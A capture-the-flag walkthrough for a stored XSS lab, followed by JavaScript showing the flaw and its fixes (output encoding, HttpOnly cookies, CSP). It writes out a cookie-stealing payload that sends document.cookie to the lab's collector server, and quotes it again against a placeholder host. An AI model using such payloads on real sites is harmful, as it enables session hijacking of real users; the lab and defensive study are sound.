Crate & Sleeve (SXSS)
Lab can be found at: https://webverselabs-pro.com/

Load up the page and you’ll see a vinyl community which looks very retro and hippy.

Browse to the comments, enter an XSS payload, and you’ll see a pop-up.

Go to the interact server (when you hit “Start challenge”, it appears next to the lab launcher) and enter your payload in the edit payload area. Then hit save, then “Copy URL” (in that order).
Payload:
new Image().src='http://55e0e217-3953-inscription-71bfb.interact.webverselabs-pro.com/exfil?flag='+document.cookie;

Now you’ve got the copied URL, you’ll want to get this ready:
<html>
  <body>
    <script>
      <enter your copied URL here>
    </script>
  </body>
</html>

Post the comment and go back to your interact server. You’ll see hits to /exfil and the query will contain the stolen cookie.
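
Why this worked and what stops it, as an added example that is not part of the lab or the original write-up: the comment is rendered as markup, and the cookie is readable from script. The function names, cookie value and collector host below are assumptions, and the sample inputs are constructed.

```javascript
// Added example, not lab code. Sample values below are constructed.
// Comment shaped like the one in the write-up; the collector host is a placeholder.
const storedComment =
  "<script>new Image().src='http://collector.example/exfil?flag='+document.cookie;</script>";

// Vulnerable pattern: stored text is concatenated into the page as markup.
function renderCommentUnsafe(text) {
  return '<div class="comment">' + text + '</div>';
}

// Fix 1: HTML-encode on output so the browser treats the comment as text.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}
function renderCommentSafe(text) {
  return '<div class="comment">' + escapeHtml(text) + '</div>';
}

// Fix 2: issue sensitive cookies with HttpOnly so document.cookie cannot read them.
function buildSessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Simplified model of document.cookie: only cookies set without HttpOnly are listed.
function cookiesVisibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .filter((header) => !/;\s*HttpOnly\b/i.test(header))
    .map((header) => header.split(';')[0])
    .join('; ');
}

// Fix 3 (defence in depth): a CSP that refuses inline script and off-site image loads.
const CSP_HEADER = "default-src 'self'; script-src 'self'; img-src 'self'";

console.log(renderCommentUnsafe(storedComment)); // script element reaches the browser
console.log(renderCommentSafe(storedComment));   // same comment, shown as inert text
console.log(cookiesVisibleToScript(['flag=constructed-value; Path=/']));
console.log(cookiesVisibleToScript([buildSessionCookie('flag', 'constructed-value')]));
console.log('Content-Security-Policy:', CSP_HEADER);
```

HttpOnly only keeps the cookie out of document.cookie; the output encoding is what removes the stored XSS itself.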

Thanks for following along!